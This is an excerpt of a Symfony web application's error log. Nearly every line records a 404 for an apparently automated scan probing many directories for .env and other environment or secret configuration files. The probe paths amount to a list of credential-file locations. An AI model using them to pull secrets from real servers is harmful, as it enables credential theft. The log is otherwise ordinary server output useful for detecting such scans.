  8250. [2025-12-20 20:49:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8251. [2025-12-20 20:49:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8252. [2025-12-20 20:49:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8253. [2025-12-20 20:49:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8254. [2025-12-20 20:50:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8255. [2025-12-20 20:50:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /be/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /be/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8256. [2025-12-20 20:50:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /beta/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /beta/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8257. [2025-12-20 20:50:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8258. [2025-12-20 20:50:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8259. [2025-12-20 20:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8260. [2025-12-20 20:50:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/environment.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/environment.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8261. [2025-12-20 20:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/environment.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/environment.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8262. [2025-12-20 20:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /crm/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /crm/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8263. [2025-12-20 20:51:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cron/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cron/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8264. [2025-12-20 20:51:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /current/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /current/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8265. [2025-12-20 20:51:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /demo/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /demo/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8266. [2025-12-20 20:51:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8267. [2025-12-20 20:51:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /develop/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /develop/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8268. [2025-12-20 20:51:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developer/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developer/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8269. [2025-12-20 20:51:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /development/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /development/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8270. [2025-12-20 20:51:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8271. [2025-12-20 20:51:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8272. [2025-12-20 20:51:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8273. [2025-12-20 20:51:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /erp/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /erp/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8274. [2025-12-20 20:51:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /fe/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /fe/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8275. [2025-12-20 20:52:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /front/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /front/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8276. [2025-12-20 20:52:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8277. [2025-12-20 20:52:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /frontend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /frontend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8278. [2025-12-20 20:52:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kyc/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kyc/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8279. [2025-12-20 20:52:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /laravel/core/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /laravel/core/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8280. [2025-12-20 20:52:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8281. [2025-12-20 20:52:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /live/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /live/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8282. [2025-12-20 20:52:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /live_env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /live_env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8283. [2025-12-20 20:53:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lms/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lms/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8284. [2025-12-20 20:53:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /local/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /local/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8285. [2025-12-20 20:53:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mailer/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mailer/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8286. [2025-12-20 20:53:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /market/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /market/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8287. [2025-12-20 20:53:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /marketing/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /marketing/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8288. [2025-12-20 20:53:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8289. [2025-12-20 20:53:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /new/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /new/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8290. [2025-12-20 20:53:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8291. [2025-12-20 20:54:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8292. [2025-12-20 20:54:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8293. [2025-12-20 20:54:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodeapi/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodeapi/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
